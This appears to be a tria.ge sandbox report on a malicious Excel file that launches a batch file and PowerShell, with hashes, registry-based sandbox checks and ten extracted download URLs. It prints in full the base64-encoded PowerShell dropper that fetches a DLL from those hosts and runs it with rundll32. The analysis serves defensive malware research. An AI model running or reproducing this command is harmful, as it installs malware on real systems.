Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
133s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2024, 22:20
Behavioral task
behavioral1
Sample
ac3eb0fc4f8e3552acbbb90c3f9d1e3b920a3a157b9f2c121f4e33e2b6fd6bb6.xls
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
ac3eb0fc4f8e3552acbbb90c3f9d1e3b920a3a157b9f2c121f4e33e2b6fd6bb6.xls
Resource
win10v2004-20241007-en
General
-
Target
ac3eb0fc4f8e3552acbbb90c3f9d1e3b920a3a157b9f2c121f4e33e2b6fd6bb6.xls
-
Size
144KB
-
MD5
4e5ddc43df4e2df4755a36d76c268c68
-
SHA1
e6f524a955a7ba956b5d60bc70332b4955bfb89a
-
SHA256
ac3eb0fc4f8e3552acbbb90c3f9d1e3b920a3a157b9f2c121f4e33e2b6fd6bb6
-
SHA512
9a7cc46c2f7cf2193c7d7c6b6eb7cb9fc7a22ba380128cefc444fb3aed7b60edce2d47029ac1845680699d7daa43b2d7397fe8701d2b4b83c038d3fba16fb477
-
SSDEEP
3072:L7cKoSsxzNDZLDZjlbR868O8K0c03D38TehYTdeHVhjqabWHLtyeGx6Z84TI7Gxl:HcKoSsxzNDZLDZjlbR868O8K0c03D38l
Malware Config
Extracted
http://four.renovatiog.ltd/wp-includes/KGzoB0zsRKZjjEe/
http://adultfriendfinder-adultfriends.com/mmfdoublepenetrationadultfriends/0pcEeJPfwMU/
http://jwellery.fameitc.com/wp-includes/wQK7z9cEcwWCUG/
http://arcgakuin-dev2.sukoburu-secure.com/l35uhr/R1evmjjhga/
http://bimesarayenovin.ir/wp-admin/z464/
http://hostfeeling.com/wp-admin/DidtoZk2EEc7BWXyhh/
http://gardeningfilm.com/wp-content/Ef/
http://moneymagnetentertainment.com/pz66t8y/Bd0sR0htA8mHibNJrk/
https://100lamp.com.ua:443/sale/a/
http://queenofluv.com/uemsub/peLSdHCvfhkge/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3244 4016 cmd.exe 82 -
Blocklisted process makes network request 4 IoCs
flow pid Process 27 4440 powershell.exe 31 4440 powershell.exe 35 4440 powershell.exe 39 4440 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4016 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4440 powershell.exe 4440 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4440 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4016 wrote to memory of 3244 4016 EXCEL.EXE 86 PID 4016 wrote to memory of 3244 4016 EXCEL.EXE 86 PID 3244 wrote to memory of 4440 3244 cmd.exe 88 PID 3244 wrote to memory of 4440 3244 cmd.exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ac3eb0fc4f8e3552acbbb90c3f9d1e3b920a3a157b9f2c121f4e33e2b6fd6bb6.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\uylcsekn.bat" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AZgBvAHUAcgAuAHIAZQBuAG8AdgBhAHQAaQBvAGcALgBsAHQAZAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEsARwB6AG8AQgAwAHoAcwBSAEsAWgBqAGoARQBlAC8ALABoAHQAdABwADoALwAvAGEAZAB1AGwAdABmAHIAaQBlAG4AZABmAGkAbgBkAGUAcgAtAGEAZAB1AGwAdABmAHIAaQBlAG4AZABzAC4AYwBvAG0ALwBtAG0AZgBkAG8AdQBiAGwAZQBwAGUAbgBlAHQAcgBhAHQAaQBvAG4AYQBkAHUAbAB0AGYAcgBpAGUAbgBkAHMALwAwAHAAYwBFAGUASgBQAGYAdwBNAFUALwAsAGgAdAB0AHAAOgAvAC8AagB3AGUAbABsAGUAcgB5AC4AZgBhAG0AZQBpAHQAYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdwBRAEsANwB6ADkAYwBFAGMAdwBXAEMAVQBHAC8ALABoAHQAdABwADoALwAvAGEAcgBjAGcAYQBrAHUAaQBuAC0AZABlAHYAMgAuAHMAdQBrAG8AYgB1AHIAdQAtAHMAZQBjAHUAcgBlAC4AYwBvAG0ALwBsADMANQB1AGgAcgAvAFIAMQBlAHYAbQBqAGoAaABnAGEALwAsAGgAdAB0AHAAOgAvAC8AYgBpAG0AZQBzAGEAcgBhAHkAZQBuAG8AdgBpAG4ALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwB6ADQANgA0AC8ALABoAHQAdABwADoALwAvAGgAbwBzAHQAZgBlAGUAbABpAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ARABpAGQAdABvAFoAawAyAEUARQBjADcAQgBXAFgAeQBoAGgALwAsAGgAdAB0AHAAOgAvAC8AZwBhAHIAZABlAG4AaQBuAGcAZgBpAGwAbQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEUAZgAvACwAaAB0AHQAcAA6AC8ALwBtAG8AbgBlAHkAbQBhAGcAbgBlAHQAZQBuAHQAZQByAHQAYQBpAG4AbQBlAG4AdAAuAGMAbwBtAC8AcAB6ADYANgB0ADgAeQAvAEIAZAAwAHMAUgAwAGgAdABBADgAbQBIAGkAYgBOAEoAcgBrAC8ALABoAHQAdABwAHMAOgAvAC8AMQAwADAAbABhAG0AcAAuAGMAbwBtAC4AdQBhADoANAA0ADMALwBzAGEAbABlAC8AYQAvACwAaAB0AHQAcAA6AC8ALwBxAHUAZQBlAG4AbwBmAGwAdQB2AC4AYwBvAG0ALwB1AGUAbQBzAHUAYgAvAHAAZQBMAFMAZABIAEMAdgBmAGgAawBnAGUALwAiAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHMAdAAgAGkAbgAgACQAcgBvAHcAaQBmAGkAdQBkACkAewAkAHIAcgB5AGkAdQBkAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAZgBnAGgAaQB1AHMAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAPQAiAGMAOgBcAHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcACIAKwAkAHIAcgB5AGkAdQBkACsAIgAuAGQAbABsACIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABzAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAOwBpAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwApAHsAaQBmACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAA1ADAAMAAwADAAKQB7ACQAZwBoAEQARABGAEoASABrADUAZgA9ACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHcAbwB3ADYANABcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIAOwAkAHQAeQBpAGQAdQBpAHMAZABmAGYAPQAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKwAiACwAZgAiACsAJABmAGcAaABpAHUAcwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGcAaABEAEQARgBKAEgAawA1AGYAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJAB0AHkAaQBkAHUAaQBzAGQAZgBmADsAYgByAGUAYQBrADsAfQB9AH0A3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5b3e87e4fda09592bebf3522c319e8b79
SHA1dc061034bbcc3a397e046b5e512ed0235a397fac
SHA256d47ce3fd5ecb89f6a9ab9c71b1541f27236da06a39732efdee85cbaf093a8246
SHA5129b1576eea10d6d70fc8e33bf3df994ae0d02ae6c963c6baa270f095ced7240aae85501a92c9e7f0f6b25d65f356deff4aa644d6073d39d455d15d864e12e7477